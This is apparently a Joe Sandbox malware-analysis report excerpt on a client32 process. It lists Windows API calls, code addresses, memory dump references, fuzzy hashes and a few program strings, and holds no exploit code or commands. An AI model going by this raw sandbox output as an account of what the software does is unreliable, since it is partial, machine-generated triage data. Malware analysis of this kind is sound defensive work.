                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$Encode$Decode
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1898114064-0
                                                                                                                                                                                                    • Opcode ID: 7f4e889e69cccff6c52dc0f6799f7d199ddbbbff2afac02f1e6d7e91f36d2e5d
                                                                                                                                                                                                    • Instruction ID: 865a5de33b780d49622554ffb0a8386059ac67280241af18dea6a2ab0d8d04ff
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f4e889e69cccff6c52dc0f6799f7d199ddbbbff2afac02f1e6d7e91f36d2e5d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF11E976601227AFD7419FB5CCC085AFBE9EB41268715043BE826D3160FB71ED10CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110250F7
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00001399), ref: 11025131
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 1102514A
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 11025154
                                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025196
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$DispatchItemTranslate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1381171329-0
                                                                                                                                                                                                    • Opcode ID: 9bbe141cbcae0986ab8e1a5d19c673565b62793078cbe47edbac0050ed91c493
                                                                                                                                                                                                    • Instruction ID: 4970fc911a0e855f64a3d9e647d9240b716c91892a3758399f36bf61488b9f97
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9bbe141cbcae0986ab8e1a5d19c673565b62793078cbe47edbac0050ed91c493
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6421AE71E0030B6BEB21DA65CC85FAFB3FCAB44708F904469EA1792180FB75E401CB95
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11023387
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00001399), ref: 110233C1
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 110233DA
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 110233E4
                                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11023426
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$DispatchItemTranslate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1381171329-0
                                                                                                                                                                                                    • Opcode ID: 1eedb8004f846199553b9819b36fcc4fba7ec9623a11643e01901e57e73e0ceb
                                                                                                                                                                                                    • Instruction ID: 550a142869b4f1c1193fc2f7bd4fc6518863fc800a3782c30ff24b2ab7768c02
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1eedb8004f846199553b9819b36fcc4fba7ec9623a11643e01901e57e73e0ceb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0721A175E0430B6BD711DF65CC85BAFB3ACAB48308F808469EA5296280FF74F501CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1103F000: DeleteObject.GDI32(?), ref: 1103F0EB
                                                                                                                                                                                                    • CreateRectRgnIndirect.GDI32(?), ref: 1103F168
                                                                                                                                                                                                    • CombineRgn.GDI32(?,?,00000000,00000002), ref: 1103F17C
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 1103F183
                                                                                                                                                                                                    • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1103F1A6
                                                                                                                                                                                                    • CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 1103F1BD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CombineCreateDeleteObjectRect$Indirect
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3044651595-0
                                                                                                                                                                                                    • Opcode ID: 1250bfdb64eb9f94442feb870266ab3da7c928c1294f43dacfd40da9a11fa5ee
                                                                                                                                                                                                    • Instruction ID: 27b6d86d25d7e193214482d66684a995ae6d2575b2198652133f57a3d860c4fb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1250bfdb64eb9f94442feb870266ab3da7c928c1294f43dacfd40da9a11fa5ee
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26116031A50702AFE721CE64D888B9AF7ECFB45716F00812EE66992180C770B881CB93
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 1100B2A0
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 1100B2D9
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 1100B2F8
                                                                                                                                                                                                      • Part of subcall function 1100A200: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1100A21E
                                                                                                                                                                                                      • Part of subcall function 1100A200: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A248
                                                                                                                                                                                                      • Part of subcall function 1100A200: GetLastError.KERNEL32 ref: 1100A250
                                                                                                                                                                                                      • Part of subcall function 1100A200: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A264
                                                                                                                                                                                                      • Part of subcall function 1100A200: CloseHandle.KERNEL32(00000000), ref: 1100A26B
                                                                                                                                                                                                    • waveOutUnprepareHeader.WINMM(00000000,?,00000020), ref: 1100B308
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1100B30F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Enter$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3652779745-0
                                                                                                                                                                                                    • Opcode ID: 2ffaf857092779b4cc8c6dc948aa08485a8b39598cc2e1fcd4f28cf9cf4d7f7e
                                                                                                                                                                                                    • Instruction ID: ec5bb7023ba9694b1826725806baee6a54caa52fbc33dd5691a93a0cc33b1c6d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ffaf857092779b4cc8c6dc948aa08485a8b39598cc2e1fcd4f28cf9cf4d7f7e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C111C27A900B16ABE311CF60CC88BEFB7ECAF48358F004919FA2692141D370B540CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • PostMessageA.USER32(0001048A,00000501,00000000,00000000), ref: 11057461
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Warning. DoNotify(%d) not processed, xrefs: 1105835B
                                                                                                                                                                                                    • Unable to select/accept connection within 10sec, ignoring cmd %d, xrefs: 1105747B
                                                                                                                                                                                                    • Warning. Eval period expired - ignoring cmd %d (x%x) - idata %x - VistaUI %d, xrefs: 110574EA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessagePost
                                                                                                                                                                                                    • String ID: Unable to select/accept connection within 10sec, ignoring cmd %d$Warning. DoNotify(%d) not processed$Warning. Eval period expired - ignoring cmd %d (x%x) - idata %x - VistaUI %d
                                                                                                                                                                                                    • API String ID: 410705778-2398254728
                                                                                                                                                                                                    • Opcode ID: ba57e33ba6e0677790ef1c60b987477872059b8d4379fee97220d80381384bfa
                                                                                                                                                                                                    • Instruction ID: 05798701b428304c80057879d977071bcb7a017165537b33727636eef533cf84
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba57e33ba6e0677790ef1c60b987477872059b8d4379fee97220d80381384bfa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DD10975E0064A9BDB94CF95D880BAEF7B5FB84328F5082BEDD1557380EB356940CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,771CC310,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000002C,?,?,?,?,?,?,?,00000000,111814A6,000000FF), ref: 110B3615
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,111814A6,000000FF), ref: 110B361F
                                                                                                                                                                                                    • GetVersion.KERNEL32(?,?,?,?,?,?,?,00000000,111814A6,000000FF), ref: 110B363A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateEvent$CriticalInitializeSectionVersionwsprintf
                                                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                                                    • API String ID: 2144009176-3788999226
                                                                                                                                                                                                    • Opcode ID: b3d0b7730889c8a39bc5667815450363e26f6493fe9bb372c581f0bba6403d69
                                                                                                                                                                                                    • Instruction ID: 38b2c4dcff0dedf9a92b00eefd602a69c273a846f0a1c46fad91db0527ff3e0a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3d0b7730889c8a39bc5667815450363e26f6493fe9bb372c581f0bba6403d69
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6514EB5D04705AFC714DF69C880AAAFBF8FB48704F50892EE55A97740EB74A904CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf$VisibleWindow
                                                                                                                                                                                                    • String ID: %d,%d,%d,%d,%d,%d
                                                                                                                                                                                                    • API String ID: 1671172596-1913222166
                                                                                                                                                                                                    • Opcode ID: 3633f91739e3d0e548805f3352e2f94a873563653eab31367022a76d7a3970fd
                                                                                                                                                                                                    • Instruction ID: 343a7c5902a362ececb8f7ca127abed5b4c5d2d50e5eb0de1d2da9fabf51934b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3633f91739e3d0e548805f3352e2f94a873563653eab31367022a76d7a3970fd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17519C74B00215AFD710CB68CC80FAAB7F9AF88704F508698E6599B281CB70ED45CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,00000000), ref: 1101F2C5
                                                                                                                                                                                                    • GetSaveFileNameA.COMDLG32(?), ref: 1101F2E7
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
